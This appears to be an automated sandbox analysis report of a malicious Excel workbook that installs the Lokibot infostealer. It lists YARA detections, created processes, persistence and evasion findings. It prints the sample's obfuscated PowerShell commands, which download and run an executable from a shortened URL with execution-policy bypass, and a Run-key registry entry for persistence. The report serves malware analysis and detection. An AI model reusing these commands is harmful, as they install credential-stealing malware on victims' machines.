                Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: ntrwe.exe.11.dr, i5Y/Wm2.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: ntrwe.exe.11.dr, Fe1/Fy1.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 11.0.12.exe.12a0000.0.unpack, Fe1/Fy1.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 11.0.12.exe.12a0000.0.unpack, i5Y/Wm2.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 11.2.12.exe.12a0000.3.unpack, i5Y/Wm2.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 11.2.12.exe.12a0000.3.unpack, Fe1/Fy1.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 15.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 15.0.ntrwe.exe.e90000.0.unpack, Fe1/Fy1.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 15.2.ntrwe.exe.e90000.4.unpack, i5Y/Wm2.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 15.2.ntrwe.exe.e90000.4.unpack, Fe1/Fy1.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 16.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                Source: classification engine | Classification label: mal100.spyw.expl.evad.winXLS@27/18@2/3
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\B5DE0000
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCF6F.tmp
                Source: 6Cprm97UTl.xls | OLE indicator, Workbook stream: true
                Source: C:\Windows\SysWOW64\reg.exe | Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........X.......N.......p...............
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\ntrwe.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
                Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: unknown | Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknown | Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: unknown | Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: C:\Users\user\ntrwe.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Users\user\ntrwe.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: RegAsm.pdb source: RegAsm.exe
                Source: Binary string: mscorrc.pdb source: powershell.exe, 00000006.00000002.2099102007.0000000002720000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2140184576.000000001B940000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2158358112.000000001B8A0000.00000002.00000001.sdmp

                Data Obfuscation:

                Obfuscated command line found
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Yara detected aPLib compressed binary
                Source: Yara match | File source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Code function: 11_2_012A5456 push ss; retf
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Code function: 11_2_0031AB04 pushad ; ret
                Source: C:\Users\user\ntrwe.exe | Code function: 15_2_00E95456 push ss; retf
                Source: C:\Users\user\ntrwe.exe | Code function: 15_2_005013F1 push edx; retf
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_0025523F push cs; iretd
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00402AC0 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 19_2_0123523F push cs; iretd

                Persistence and Installation Behavior:

                Drops PE files to the document folder of the user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\12.exe
                Source: C:\Users\user\ntrwe.exe | File created: C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exe | File created: C:\Users\user\ntrwe.exe

                Boot Survival:

                Drops PE files to the user root directory
                Source: C:\Users\user\AppData\Local\Temp\12.exe | File created: C:\Users\user\ntrwe.exe
                Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jfdts

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile opened: C:\Users\user\AppData\Local\Temp\12.exe\:Zone.Identifier read attributes | delete
                Source: C:\Users\user\ntrwe.exeFile opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | delete
                Source: C:\Users\user\ntrwe.exeFile opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | delete
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
